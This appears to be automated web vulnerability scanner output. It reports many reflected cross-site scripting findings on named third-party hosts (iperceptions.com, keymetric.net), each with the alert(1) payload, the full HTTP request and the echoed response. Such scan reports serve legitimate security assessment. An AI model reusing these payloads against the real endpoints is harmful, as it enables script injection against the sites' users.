This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8ab4b<img%20src%3da%20onerror%3dalert(1)>20d1e3c8994 was submitted in the REST URL parameter 4. This input was echoed as 8ab4b<img src=a onerror=alert(1)>20d1e3c8994 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37ae8<img%20src%3da%20onerror%3dalert(1)>e810f7a2cc6 was submitted in the REST URL parameter 4. This input was echoed as 37ae8<img src=a onerror=alert(1)>e810f7a2cc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 967a2<img%20src%3da%20onerror%3dalert(1)>af29eec5e58 was submitted in the REST URL parameter 4. This input was echoed as 967a2<img src=a onerror=alert(1)>af29eec5e58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee1b3<img%20src%3da%20onerror%3dalert(1)>4280baca906 was submitted in the REST URL parameter 4. This input was echoed as ee1b3<img src=a onerror=alert(1)>4280baca906 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2d5c2<img%20src%3da%20onerror%3dalert(1)>335dd98f5de was submitted in the REST URL parameter 4. This input was echoed as 2d5c2<img src=a onerror=alert(1)>335dd98f5de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1afb2<img%20src%3da%20onerror%3dalert(1)>f841bf64a1b was submitted in the REST URL parameter 4. This input was echoed as 1afb2<img src=a onerror=alert(1)>f841bf64a1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b205b<img%20src%3da%20onerror%3dalert(1)>68a15209a5 was submitted in the REST URL parameter 4. This input was echoed as b205b<img src=a onerror=alert(1)>68a15209a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 21c83<img%20src%3da%20onerror%3dalert(1)>643d48be1b7 was submitted in the REST URL parameter 4. This input was echoed as 21c83<img src=a onerror=alert(1)>643d48be1b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ec059<img%20src%3da%20onerror%3dalert(1)>917f01586b7 was submitted in the REST URL parameter 4. This input was echoed as ec059<img src=a onerror=alert(1)>917f01586b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6b99a<img%20src%3da%20onerror%3dalert(1)>fa4ea1be793 was submitted in the REST URL parameter 4. This input was echoed as 6b99a<img src=a onerror=alert(1)>fa4ea1be793 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3975<img%20src%3da%20onerror%3dalert(1)>f5b211b3a20 was submitted in the REST URL parameter 4. This input was echoed as b3975<img src=a onerror=alert(1)>f5b211b3a20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1300b<img%20src%3da%20onerror%3dalert(1)>f886d0f9184 was submitted in the REST URL parameter 4. This input was echoed as 1300b<img src=a onerror=alert(1)>f886d0f9184 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the cD request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 836eb%3balert(1)//a0516d60980 was submitted in the cD parameter. This input was echoed as 836eb;alert(1)//a0516d60980 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webValidator.aspx?sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q-WEB2&cD=90836eb%3balert(1)//a0516d60980&rF=False&iType=1&domainname=0 HTTP/1.1 Host: ips-invite.iperceptions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Srv-By: IPS-INVITE04 P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA" Date: Fri, 30 Sep 2011 12:12:15 GMT Content-Length: 3026
var sID= '35522'; var sC= 'IPE35522';var rF='False'; var brow= 'Chrome'; var vers= '14'; var lID= '1'; var loc= '4Q-WEB2'; var ps='sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q ...[SNIP]... etLinkerUrl(url, false); } catch(e){ } return url; }var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && GetC('IPE_S_35522') == null && tCv != null) {CCook(sC,sC,90836eb;alert(1)//a0516d60980); Ld();} DCook(tC);function CCook(n,v,d){var exp= ''; var dm = document.domain;if (d) {var dt= new Date();dt.setTime(dt.getTime()+(d*24*60*60*1000));exp='; expires='+dt.toGMTString();}document.cookie= ...[SNIP]...
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1e2a'%3balert(1)//4083be8c2f8 was submitted in the loc parameter. This input was echoed as d1e2a';alert(1)//4083be8c2f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webValidator.aspx?sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q-WEB2d1e2a'%3balert(1)//4083be8c2f8&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1 Host: ips-invite.iperceptions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Srv-By: IPS-INVITE02 P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA" Date: Fri, 30 Sep 2011 12:11:57 GMT Content-Length: 3030
var sID= '35522'; var sC= 'IPE35522';var rF='False'; var brow= 'Chrome'; var vers= '14'; var lID= '1'; var loc= '4Q-WEB2d1e2a';alert(1)//4083be8c2f8'; var ps='sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q-WEB2d1e2a%27%3balert(1)%2f%2f4083be8c2f8&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite ...[SNIP]...
The value of the hist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c2ed'%3balert(1)//2185f7adbe6 was submitted in the hist parameter. This input was echoed as 3c2ed';alert(1)//2185f7adbe6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=3c2ed'%3balert(1)//2185f7adbe6&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the lag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9592'%3balert(1)//4b331517d4 was submitted in the lag parameter. This input was echoed as c9592';alert(1)//4b331517d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=c9592'%3balert(1)//4b331517d4&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... ': val = '0'; break; case 'cpca': val = 'Campaign not provided'; break; case 'kmca': val = 'Campaign not provided'; break; case 'cpag': val = 'c9592';alert(1)//4b331517d4'; break; case 'kmag': val = 'c9592';alert(1)//4b331517d4'; break; case 'kw': val = 'Raw Query not available'; break; case 'kmkw': val = 'Raw Query not a ...[SNIP]...
The value of the las request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e66b'%3balert(1)//0808889a259 was submitted in the las parameter. This input was echoed as 9e66b';alert(1)//0808889a259 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=09e66b'%3balert(1)//0808889a259&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... 5247,;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:''); kmLat = new Date(); kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays); document.cookie = 'kmL6633=1|09e66b';alert(1)//0808889a259|Campaign not provided|AdGroup not provided|Keyword not provided|unk|Referrer information not available|Raw Query not available;expires=' + kmLat.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:''); ...[SNIP]...
The value of the lc1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f404'%3balert(1)//66f85e6c9f9 was submitted in the lc1 parameter. This input was echoed as 7f404';alert(1)//66f85e6c9f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-17f404'%3balert(1)//66f85e6c9f9&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... 'unk'; break; case 'kmrq': val = 'Raw Query not available'; break; case 'kmrq': val = 'Raw Query not available'; break; case 'kmc1': val = '1833889000-17f404';alert(1)//66f85e6c9f9'; break; case 'kmc1': val = '1833889000-17f404';alert(1)//66f85e6c9f9'; break; case 'kmc2': val = 'N/A'; break; case 'kmc2': val = 'N/A'; break; c ...[SNIP]...
The value of the lc2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce502'%3balert(1)//1302b0e5ca5 was submitted in the lc2 parameter. This input was echoed as ce502';alert(1)//1302b0e5ca5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=ce502'%3balert(1)//1302b0e5ca5&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... val = 'Raw Query not available'; break; case 'kmc1': val = '1833889000-1'; break; case 'kmc1': val = '1833889000-1'; break; case 'kmc2': val = 'ce502';alert(1)//1302b0e5ca5'; break; case 'kmc2': val = 'ce502';alert(1)//1302b0e5ca5'; break; case 'kmc3': val = 'N/A'; break; case 'kmc3': val = 'N/A'; break; case 'kmc4': ...[SNIP]...
The value of the lc3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47eca'%3balert(1)//e9854004d58 was submitted in the lc3 parameter. This input was echoed as 47eca';alert(1)//e9854004d58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=47eca'%3balert(1)//e9854004d58&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... ; break; case 'kmc1': val = '1833889000-1'; break; case 'kmc2': val = 'N/A'; break; case 'kmc2': val = 'N/A'; break; case 'kmc3': val = '47eca';alert(1)//e9854004d58'; break; case 'kmc3': val = '47eca';alert(1)//e9854004d58'; break; case 'kmc4': val = 'N/A'; break; case 'kmc4': val = 'N/A'; break; case 'kmc5': ...[SNIP]...
The value of the lc4 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98ec5'%3balert(1)//49abfb9ed59 was submitted in the lc4 parameter. This input was echoed as 98ec5';alert(1)//49abfb9ed59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=98ec5'%3balert(1)//49abfb9ed59&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... l = 'N/A'; break; case 'kmc2': val = 'N/A'; break; case 'kmc3': val = 'N/A'; break; case 'kmc3': val = 'N/A'; break; case 'kmc4': val = '98ec5';alert(1)//49abfb9ed59'; break; case 'kmc4': val = '98ec5';alert(1)//49abfb9ed59'; break; case 'kmc5': val = 'N/A'; break; case 'kmc5': val = 'N/A'; break; case 'kmrd': ...[SNIP]...
The value of the lc5 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79f9e'%3balert(1)//b16bb549e8 was submitted in the lc5 parameter. This input was echoed as 79f9e';alert(1)//b16bb549e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=79f9e'%3balert(1)//b16bb549e8&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... l = 'N/A'; break; case 'kmc3': val = 'N/A'; break; case 'kmc4': val = 'N/A'; break; case 'kmc4': val = 'N/A'; break; case 'kmc5': val = '79f9e';alert(1)//b16bb549e8'; break; case 'kmc5': val = '79f9e';alert(1)//b16bb549e8'; break; case 'kmrd': val = 'Referrer information not available'; break; case 'newvisit': val = ...[SNIP]...
The value of the lca request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bdc7'%3balert(1)//fcb9531e7e0 was submitted in the lca parameter. This input was echoed as 7bdc7';alert(1)//fcb9531e7e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=7bdc7'%3balert(1)//fcb9531e7e0&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case 'kmas': val = '0'; break; case 'cpca': val = '7bdc7';alert(1)//fcb9531e7e0'; break; case 'kmca': val = '7bdc7';alert(1)//fcb9531e7e0'; break; case 'cpag': val = 'AdGroup not provided'; break; case 'kmag': val = 'AdGroup not pro ...[SNIP]...
The value of the lmt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcc72'%3balert(1)//8a144b00b49 was submitted in the lmt parameter. This input was echoed as bcc72';alert(1)//8a144b00b49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=bcc72'%3balert(1)//8a144b00b49&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... dGroup not provided'; break; case 'kw': val = 'Raw Query not available'; break; case 'kmkw': val = 'Raw Query not available'; break; case 'kmmt': val = 'bcc72';alert(1)//8a144b00b49'; break; case 'kmmt': val = 'bcc72';alert(1)//8a144b00b49'; break; case 'kmrq': val = 'Raw Query not available'; break; case 'kmrq': val = 'Raw Query no ...[SNIP]...
The value of the rho request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 947b1'%3balert(1)//261c1b264d4 was submitted in the rho parameter. This input was echoed as 947b1';alert(1)//261c1b264d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=947b1'%3balert(1)//261c1b264d4&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... l = 'N/A'; break; case 'kmc4': val = 'N/A'; break; case 'kmc5': val = 'N/A'; break; case 'kmc5': val = 'N/A'; break; case 'kmrd': val = '947b1';alert(1)//261c1b264d4'; break; case 'newvisit': val = 'true'; break; default: val = 'undefined'; } return val; } var km_Acct = '6633'; var cbd = km_GBD(window.location.hostname); cbd ...[SNIP]...
The value of the rqu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65450'%3balert(1)//dc7176d7fd3 was submitted in the rqu parameter. This input was echoed as 65450';alert(1)//dc7176d7fd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=65450'%3balert(1)//dc7176d7fd3&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
